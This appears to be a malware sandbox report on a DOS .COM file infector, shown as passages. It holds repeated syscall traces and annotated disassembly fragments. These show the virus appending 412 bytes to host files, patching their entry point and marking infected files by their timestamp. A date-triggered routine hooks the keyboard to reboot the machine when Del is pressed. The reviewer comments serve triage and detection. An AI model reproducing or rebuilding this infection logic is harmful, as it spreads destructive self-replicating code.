; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.322103048Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.327914033Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.32968509Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.335328383Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.33665724Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.342080461Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.350998799Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.353286059Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.362043899Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.366412376Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.373189761Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.374487836Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.377475968Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.379884349Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.380938321Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.383375659Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.385744414Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.391108436Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.400733006Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.403643713Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.413041727Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.424425631Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.431840306Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.433289303Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.435574189Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.438819493Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.440219506Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.442725644Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.444402065Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.451471304Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.461001787Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.46399865Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.473657673Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.480164155Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.487330031Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.488693443Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.491495433Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.494962742Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.496585319Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.499162848Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.501222763Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.508998065Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.518742169Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.521814961Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.531931229Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.538322499Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.544800923Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.546098638Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.548262058Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.551381472Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.55287955Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.555401307Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.558252591Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.565345879Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.57518337Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.577254325Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.584274895Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.588574252Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.596094205Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.597539963Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.599761019Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.607533558Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.608961576Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.614299947Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.616584156Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.625300156Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.634985219Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.638131824Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.647970167Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.654685706Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.661076333Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.662645288Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.664789201Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.667857259Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.669209448Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.671867415Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.674597196Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.682050035Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.694473017Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.697096329Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.706768115Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.71311254Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.719494512Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.721070515Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.723497781Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.728246859Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.729999226Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.732771107Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.73428915Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.741879085Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.751431649Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.754543207Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
; Sandbox disassembly attached to the "Get date" trace row directly above,
; which carries the first instruction: cmp dl, 1. INT 21h/AH=2Ah returns the
; day of the month in DL, so the branch below tests for the 1st.
; Linear sweep: instructions that follow an unconditional jmp here (nop
; padding, the handler further down) are not on the straight-line path.
;
; Day == 1 continues at 0x12b8a; any other day leaves for 0x12bf0, which is
; outside this listing.
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
; AH=09h prints the '$'-terminated string at DS:DX (DX is set outside this
; listing), then execution continues at 0x12bbd, also outside the listing.
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
; Reads a byte from port 60h (keyboard controller data) and compares it with
; 53h, the Del key make code. nop does not touch flags, so the je below still
; acts on this cmp.
; NOTE(review): this has the shape of an INT 09h keyboard handler; the trace
; rows after this listing log Get/Set interrupt vector 9 calls, which would
; be its installation -- confirm.
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
; No match: restore AX and chain through the far pointer stored at cs:[0x29f]
; (presumably the saved previous handler -- confirm).
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
; Match: far jump to FFFF:0000, the x86 reset entry point, i.e. the machine
; restarts when the key is seen.
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
; NOTE(review): 4B00h is the INT 21h "load and execute program" function, so
; this looks like the start of a second handler filtering program launches;
; the listing is cut off here -- confirm against the sample.
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:22.756731266Z 9 PC: 12b8e | Display string (String= '�5Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.761865687Z 53 PC: 12bc2 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.763010878Z 37 PC: 12bd4 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.764336177Z 53 PC: 12bd9 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:22.765407742Z 49 PC: 12bf0 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.320084269Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.321906707Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.328496229Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.346397711Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.354141243Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.361635908Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.363397593Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.366123637Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.375789677Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.377480573Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.384885237Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.388190486Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.397225305Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.408324733Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.411793086Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.423009575Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.430465519Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.439210235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.441467801Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.44413835Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.447307286Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.449154199Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.452049776Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.453787614Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.462487257Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.473692383Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.476886243Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.488177267Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.496134276Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.50398314Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.506759488Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.509651898Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.512990946Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.515883539Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.519770423Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.521693773Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.532550776Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.543791735Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.546988766Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.55812443Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.566783413Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.574772311Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.576735372Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.580742036Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.584132508Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.58574115Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.589727262Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.591892486Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.600349072Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.612277685Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.615651045Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.626616971Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.634148538Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.641916527Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.643255607Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.645983654Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.650135288Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.651936238Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.655103576Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.657274179Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.666419354Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.678698565Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.683080691Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.696265501Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.706307494Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.71452104Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.716118818Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.718743822Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.729274195Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.730962724Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.738903285Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.741276853Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.750989831Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.762120228Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.765100409Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.778249775Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.786017398Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.793516748Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.796444818Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.79932852Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.801450507Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.803217232Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.805210202Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.806500496Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.812416227Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.818973048Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.820983308Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.827705842Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.839614461Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.847546279Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.849470746Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.853257081Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.858039246Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.859951413Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.864146787Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.865379757Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.872406061Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.884726195Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.888206548Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
; Sandbox disassembly attached to the "Get date" trace row directly above,
; which carries the first instruction: cmp dl, 1. INT 21h/AH=2Ah returns the
; day of the month in DL, so the branch below tests for the 1st.
; Linear sweep: instructions that follow an unconditional jmp here (nop
; padding, the handler further down) are not on the straight-line path.
;
; Day == 1 continues at 0x12b8a; any other day leaves for 0x12bf0, which is
; outside this listing.
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
; AH=09h prints the '$'-terminated string at DS:DX (DX is set outside this
; listing), then execution continues at 0x12bbd, also outside the listing.
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
; Reads a byte from port 60h (keyboard controller data) and compares it with
; 53h, the Del key make code. nop does not touch flags, so the je below still
; acts on this cmp.
; NOTE(review): this has the shape of an INT 09h keyboard handler; the run on
; this page that prints the string also logs Get/Set interrupt vector 9
; calls, which would be its installation -- confirm.
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
; No match: restore AX and chain through the far pointer stored at cs:[0x29f]
; (presumably the saved previous handler -- confirm).
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
; Match: far jump to FFFF:0000, the x86 reset entry point, i.e. the machine
; restarts when the key is seen.
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
; NOTE(review): 4B00h is the INT 21h "load and execute program" function, so
; this looks like the start of a second handler filtering program launches;
; the listing is cut off here -- confirm against the sample.
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:22.890988484Z 26 PC: 12bfa | Set disk transfer address
2018-12-25T12:56:22.893930075Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.900772325Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.3442575Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.345966431Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.353263871Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.370535377Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.377968815Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.386315886Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.388781887Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
; Sandbox disassembly attached to the "Get time" trace row directly above,
; which carries the first instruction: mov word ptr [bp + 0x11e], dx (DX as
; returned by INT 21h/AH=2Ch is saved; its later use is not visible here).
; Linear sweep with linear addresses; BX (file handle for the INT 21h calls)
; is set outside this listing.
;
; NOTE(review): 0x22aad looks like a near-call target printed without 16-bit
; IP wrap-around. The next trace row (412-byte write at PC 12abb) suggests
; the routine really entered is at 0x12aad -- confirm against the sample.
0x12b40: call 0x22aad
; Opcode 99h is CWD in 16-bit code (DX = sign extension of AX). With CX also
; cleared, CX:DX is 0 for a non-negative AX, and AX=4200h is "seek from start
; of file": the file pointer goes back to offset 0.
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
; AH=40h writes CX=3 bytes from [bp+0x29c] at the current position, i.e. over
; the first three bytes of the file ("Write 3 bytes" row at PC 12b56).
; NOTE(review): after the 3-byte read and the 412-byte write this is the
; usual shape of an appending COM infector patching the host entry point;
; the buffer contents are not shown -- confirm.
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
; AX=5701h sets the file's time (CX) and date (DX) from [bp+0x2bd] and
; [bp+0x2bf]. The low five bits of the time word (seconds/2) are forced to
; 0x15, so the stamped time always reads :42 seconds.
; NOTE(review): presumably the pre-infection timestamp with the seconds field
; doubling as an "already infected" marker -- confirm. Useful for triage:
; .COM files grown by 412 bytes whose modification time ends in :42.
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
; AH=3Eh closes the handle.
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
; The listing stops mid-sequence. A later trace row is "Get or set file
; attributes" at PC 12b7c, so DX = [bp+0x2c5] is presumably the file name for
; that call -- TODO confirm.
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.391683315Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.402559367Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.405101448Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.412908114Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.423521992Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.432168937Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.443568798Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.447426869Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.458956609Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.468040356Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.476402749Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.479293454Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.481946037Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.485063321Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.487902431Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.491182756Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.493233605Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.50281356Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.513853765Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.517988408Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.530225941Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.538043317Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.547564414Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.550515973Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.553233496Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.556521085Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.558320167Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.561677433Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.56321846Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.572377653Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.584398882Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.587364168Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.598257266Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.606148063Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.614061373Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.616001058Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.619566199Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.623285364Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.625166749Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.628704432Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.630696974Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.639068558Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.650967335Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.654396134Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.66541612Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.673038165Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.68136374Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.683303001Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.686307367Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.690350491Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.692240349Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.695344091Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.697710299Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.705779458Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.716982137Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.721119649Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.7307661Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.737126633Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.743659237Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.744946018Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.746805237Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.752696624Z 66 PC: 12b4b | Move file pointer (See above)
